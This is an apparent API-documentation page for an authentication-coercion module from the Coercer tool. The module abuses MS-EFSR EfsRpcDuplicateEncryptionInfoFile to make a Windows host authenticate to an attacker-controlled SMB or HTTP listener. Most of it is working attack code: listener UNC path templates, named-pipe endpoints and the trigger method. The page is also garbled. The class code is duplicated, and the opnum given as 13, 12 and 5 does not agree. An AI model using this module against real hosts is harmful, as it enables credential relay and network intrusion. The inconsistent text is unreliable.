coercer.methods.MS_EFSR.EfsRpcDuplicateEncryptionInfoFile

  1#!/usr/bin/env python3
  2# -*- coding: utf-8 -*-
  3# File name          : EfsRpcDuplicateEncryptionInfoFile.py
  4# Author             : Podalirius (@podalirius_)
  5# Date created       : 16 Sep 2022
  6
  7
  8from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
  9from coercer.network.DCERPCSessionError import DCERPCSessionError
 10from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
 11from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID
 12
 13
class EFS_RPC_BLOB(NDRSTRUCT):
    """
    NDR encoding of the MS-EFSR ``EFS_RPC_BLOB`` structure (a length-prefixed byte buffer).

    NOTE(review): the field names look swapped relative to the specification, which
    names the DWORD length ``cbData`` and the byte pointer ``bData``. The wire layout
    (one DWORD followed by one pointer) is what gets encoded, so this is cosmetic;
    confirm against the MS-EFSR structure definition before renaming anything.
    """
    structure = (
        ('Data', DWORD),    # DWORD slot (the length count in the spec)
        ('cbData', PCHAR),  # pointer slot (the byte buffer in the spec)
    )
 19
 20
class _EfsRpcDuplicateEncryptionInfoFile(NDRCALL):
    """
    Structure to make the RPC call to EfsRpcDuplicateEncryptionInfoFile() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)

    Field order and types follow the IDL of the call; they are marshalled in this
    exact order, so do not reorder the tuple.
    """
    # Opnum of EfsRpcDuplicateEncryptionInfoFile in the MS-EFSR interface; this is
    # the value actually placed in the request header on the wire.
    opnum = 13
    structure = (
        ('SrcFileName', WSTR), # Type: wchar_t *   (the path the target is asked to read)
        ('DestFileName', WSTR), # Type: wchar_t *
        ('dwCreationDisposition', DWORD), # Type: DWORD
        ('dwAttributes', DWORD), # Type: DWORD
        ('RelativeSD', EFS_RPC_BLOB), # Type: EFS_RPC_BLOB *
        ('bInheritHandle', BOOL), # Type: BOOL
    )
 34
 35
class _EfsRpcDuplicateEncryptionInfoFileResponse(NDRCALL):
    """
    Structure to parse the response of the RPC call to EfsRpcDuplicateEncryptionInfoFile() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)
    """
    # Empty on purpose: no return fields are decoded from the reply. The caller only
    # cares whether the request raised or not.
    structure = ()
 41
 42
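class EfsRpcDuplicateEncryptionInfoFile(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function EfsRpcDuplicateEncryptionInfoFile (opnum 13) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)

    The opnum quoted above is the one carried by ``_EfsRpcDuplicateEncryptionInfoFile.opnum``,
    i.e. the value actually sent on the wire. The coercion relies on the target
    resolving the UNC path handed over in ``SrcFileName`` (the entry listed in
    ``function["vulnerable_arguments"]``); the candidate path templates live in
    ``exploit_paths``.

    Method found by:
     - [@topotam77](https://twitter.com/topotam77)
    """

    # (transport, path template) pairs. ``{{listener}}``, ``{{*_listen_port}}`` and
    # ``{{rnd(n)}}`` are placeholders filled in by the framework before the call.
    # The trailing ``\x00`` presumably terminates the wide string on the wire; keep it.
    exploit_paths = [
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
    ]

    # Endpoints the interface can be bound on. MS-EFSR exposes two interface UUIDs:
    # df1941c5-... behind \PIPE\efsrpc and c681d488-... behind the LSA-family pipes.
    # NOTE: the key is spelled "ncan_np" (not the DCE/RPC sequence name "ncacn_np");
    # the framework presumably looks it up by this exact key, so leave it as is.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\efsrpc",
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsarpc",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\samr",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsass",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\netlogon",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            }
        ]
    }

    protocol = {
        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
        "shortname": "MS-EFSR"
    }

    function = {
        "name": "EfsRpcDuplicateEncryptionInfoFile",
        # Must agree with _EfsRpcDuplicateEncryptionInfoFile.opnum; the previous
        # value (12) was a copy-paste leftover and belongs to a different call.
        "opnum": 13,
        "vulnerable_arguments": ["SrcFileName"]
    }

    def trigger(self, dcerpc_session, target):
        """
        Send one EfsRpcDuplicateEncryptionInfoFile request over *dcerpc_session*.

        Args:
            dcerpc_session: bound DCE/RPC session obtained from ``connect()``, or None.
            target: unused here; kept for the ``MSPROTOCOLRPCCALL.trigger()`` interface.

        Returns:
            ``""`` when the request was sent without raising, the caught exception
            object when it raised, and ``None`` when *dcerpc_session* is None (an
            error line is printed in that case).
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
        try:
            request = _EfsRpcDuplicateEncryptionInfoFile()
            # Both names carry the coercion path; SrcFileName is the argument the
            # framework flags as the vulnerable one.
            request['SrcFileName'] = self.path
            request['DestFileName'] = self.path
            request['dwCreationDisposition'] = 0
            request['dwAttributes'] = 0
            # Empty blob: fields are left at impacket's defaults.
            request['RelativeSD'] = EFS_RPC_BLOB()
            request['bInheritHandle'] = 0
            # The reply is not inspected (the Response class declares no fields);
            # only the absence of an exception matters, so the result is discarded.
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Framework convention: hand the error back to the caller instead of raising.
            return err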
class EFS_RPC_BLOB(impacket.dcerpc.v5.ndr.NDRSTRUCT):
class EFS_RPC_BLOB(NDRSTRUCT):
    """
    NDR encoding of the MS-EFSR ``EFS_RPC_BLOB`` structure (a length-prefixed byte buffer).

    NOTE(review): the field names look swapped relative to the specification, which
    names the DWORD length ``cbData`` and the byte pointer ``bData``. The wire layout
    (one DWORD followed by one pointer) is what gets encoded, so this is cosmetic;
    confirm against the MS-EFSR structure definition before renaming anything.
    """
    structure = (
        ('Data', DWORD),    # DWORD slot (the length count in the spec)
        ('cbData', PCHAR),  # pointer slot (the byte buffer in the spec)
    )

This is the base class for all DCERPC NDR types and represents an NDR primitive type.

structure = (('Data', <class 'impacket.dcerpc.v5.ndr.NDRULONG'>), ('cbData', <class 'impacket.dcerpc.v5.dtypes.PCHAR'>))
class EfsRpcDuplicateEncryptionInfoFile(coercer.models.MSPROTOCOLRPCCALL.MSPROTOCOLRPCCALL):
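class EfsRpcDuplicateEncryptionInfoFile(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function EfsRpcDuplicateEncryptionInfoFile (opnum 13) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)

    The opnum quoted above is the one carried by ``_EfsRpcDuplicateEncryptionInfoFile.opnum``,
    i.e. the value actually sent on the wire. The coercion relies on the target
    resolving the UNC path handed over in ``SrcFileName`` (the entry listed in
    ``function["vulnerable_arguments"]``); the candidate path templates live in
    ``exploit_paths``.

    Method found by:
     - [@topotam77](https://twitter.com/topotam77)
    """

    # (transport, path template) pairs. ``{{listener}}``, ``{{*_listen_port}}`` and
    # ``{{rnd(n)}}`` are placeholders filled in by the framework before the call.
    # The trailing ``\x00`` presumably terminates the wide string on the wire; keep it.
    exploit_paths = [
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
    ]

    # Endpoints the interface can be bound on. MS-EFSR exposes two interface UUIDs:
    # df1941c5-... behind \PIPE\efsrpc and c681d488-... behind the LSA-family pipes.
    # NOTE: the key is spelled "ncan_np" (not the DCE/RPC sequence name "ncacn_np");
    # the framework presumably looks it up by this exact key, so leave it as is.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\efsrpc",
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsarpc",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\samr",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsass",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\netlogon",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            }
        ]
    }

    protocol = {
        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
        "shortname": "MS-EFSR"
    }

    function = {
        "name": "EfsRpcDuplicateEncryptionInfoFile",
        # Must agree with _EfsRpcDuplicateEncryptionInfoFile.opnum; the previous
        # value (12) was a copy-paste leftover and belongs to a different call.
        "opnum": 13,
        "vulnerable_arguments": ["SrcFileName"]
    }

    def trigger(self, dcerpc_session, target):
        """
        Send one EfsRpcDuplicateEncryptionInfoFile request over *dcerpc_session*.

        Args:
            dcerpc_session: bound DCE/RPC session obtained from ``connect()``, or None.
            target: unused here; kept for the ``MSPROTOCOLRPCCALL.trigger()`` interface.

        Returns:
            ``""`` when the request was sent without raising, the caught exception
            object when it raised, and ``None`` when *dcerpc_session* is None (an
            error line is printed in that case).
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
        try:
            request = _EfsRpcDuplicateEncryptionInfoFile()
            # Both names carry the coercion path; SrcFileName is the argument the
            # framework flags as the vulnerable one.
            request['SrcFileName'] = self.path
            request['DestFileName'] = self.path
            request['dwCreationDisposition'] = 0
            request['dwAttributes'] = 0
            # Empty blob: fields are left at impacket's defaults.
            request['RelativeSD'] = EFS_RPC_BLOB()
            request['bInheritHandle'] = 0
            # The reply is not inspected (the Response class declares no fields);
            # only the absence of an exception matters, so the result is discarded.
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Framework convention: hand the error back to the caller instead of raising.
            return err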

Coercing a machine to authenticate using function EfsRpcDuplicateEncryptionInfoFile (opnum 5) of MS-EFSR Protocol

Method found by:

exploit_paths = [('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), ('http', '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00')]
access = {'ncan_np': [{'namedpipe': '\\PIPE\\efsrpc', 'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsarpc', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\samr', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsass', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\netlogon', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}], 'ncacn_ip_tcp': [{'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}]}
protocol = {'longname': '[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol', 'shortname': 'MS-EFSR'}
function = {'name': 'EfsRpcDuplicateEncryptionInfoFile', 'opnum': 12, 'vulnerable_arguments': ['SrcFileName']}
def trigger(self, dcerpc_session, target):
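    def trigger(self, dcerpc_session, target):
        """
        Send one EfsRpcDuplicateEncryptionInfoFile request over *dcerpc_session*.

        Args:
            dcerpc_session: bound DCE/RPC session obtained from ``connect()``, or None.
            target: unused here; kept for the ``MSPROTOCOLRPCCALL.trigger()`` interface.

        Returns:
            ``""`` when the request was sent without raising, the caught exception
            object when it raised, and ``None`` when *dcerpc_session* is None (an
            error line is printed in that case).
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
        try:
            request = _EfsRpcDuplicateEncryptionInfoFile()
            # Both names carry the coercion path; SrcFileName is the argument the
            # framework flags as the vulnerable one.
            request['SrcFileName'] = self.path
            request['DestFileName'] = self.path
            request['dwCreationDisposition'] = 0
            request['dwAttributes'] = 0
            # Empty blob: fields are left at impacket's defaults.
            request['RelativeSD'] = EFS_RPC_BLOB()
            request['bInheritHandle'] = 0
            # The reply is not inspected (the Response class declares no fields);
            # only the absence of an exception matters, so the unused local is dropped.
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Framework convention: hand the error back to the caller instead of raising.
            return err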